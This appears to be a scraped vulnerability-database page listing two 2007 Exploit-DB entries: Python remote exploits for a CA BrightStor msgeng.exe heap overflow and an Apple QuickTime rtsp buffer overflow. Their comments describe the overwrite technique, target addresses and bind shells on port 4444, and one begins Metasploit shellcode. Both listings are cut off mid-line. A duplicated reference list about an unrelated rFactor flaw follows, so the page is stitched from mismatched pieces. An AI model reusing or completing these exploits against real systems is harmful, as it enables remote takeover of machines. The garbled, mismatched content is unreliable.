CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (1)
exploitdb·2007-01-27
CVE-2007-0449 CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (1)
CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (1)
---
#!/usr/bin/python
# I couldnt find a reliable exploit for my analysis and so came up with this.
# Remote exploit for the CA BrightStor msgeng.exe service heap overflow
# vulnerability as described in LS-20060313.pdf on lssec.com. The exploit was
# tested on windows 2000 SP0. Opens a shell on TCP port 4444. Shouldnt be hard
# to port to other platforms. The exploit overwrites the
# UnhandledExceptionFilter in windows 2000 SP0 (located at 77EE044C) with the
# address of call dword ptr [esi +4C] located in user32.dll. At the time when
# UEF is called esi +4C contains a pointer to our shellcode.
#
# Winny M Thomas ;-)
# Author shall bear no responsibility for any screw ups caused by using this code
from impacket.dcerpc impor
Exploit-DB
Apple QuickTime (Windows 2000) - 'rtsp URL Handler' Remote Buffer Overflow
exploitdb·2007-01-03
CVE-2007-0015 Apple QuickTime (Windows 2000) - 'rtsp URL Handler' Remote Buffer Overflow
Apple QuickTime (Windows 2000) - 'rtsp URL Handler' Remote Buffer Overflow
---
#!/usr/bin/python
#Port bind exploit for apple quicktime rtsp vulnerability
#Tested on windows 2000 SP0 and SP4 with quicktime 7.1.3.100. Should be easy
#to port the exploit to others. All one needs to do is look for the appropriate
#jump address. Certain characters are not permitted in the shellcode.
#Alphanumeric shellcodes work fine.
#This script creates a qtl file which when clicked upon binds a shell to TCP
#port 4444. This file can be delivered through several means; HTTP, SMTP etc
#
# Winny Thomas ;-)
# Author shall bear no responsibility for any kind of screws up caused by using
# this code
import sys
#alpha numeric port bind shellcode from metasploit; binds shell to port 4444
shellcode = "\xeb\x03\x
No writeups or analysis indexed.
http://aluigi.org/poc/rfactorx.ziphttp://forum.racesimcentral.com/showthread.php?t=298659http://secunia.com/advisories/26526http://securityreason.com/securityalert/3037http://www.rfactor.net/?page=news_09-26_1255http://www.securityfocus.com/archive/1/477023/100/0/threadedhttp://www.securityfocus.com/archive/1/480591/100/200/threadedhttp://www.securityfocus.com/archive/1/480921/100/200/threadedhttp://www.securityfocus.com/bid/25358https://exchange.xforce.ibmcloud.com/vulnerabilities/36093http://aluigi.org/poc/rfactorx.ziphttp://forum.racesimcentral.com/showthread.php?t=298659http://secunia.com/advisories/26526http://securityreason.com/securityalert/3037http://www.rfactor.net/?page=news_09-26_1255http://www.securityfocus.com/archive/1/477023/100/0/threadedhttp://www.securityfocus.com/archive/1/480591/100/200/threadedhttp://www.securityfocus.com/archive/1/480921/100/200/threadedhttp://www.securityfocus.com/bid/25358https://exchange.xforce.ibmcloud.com/vulnerabilities/36093
2007-08-21
Published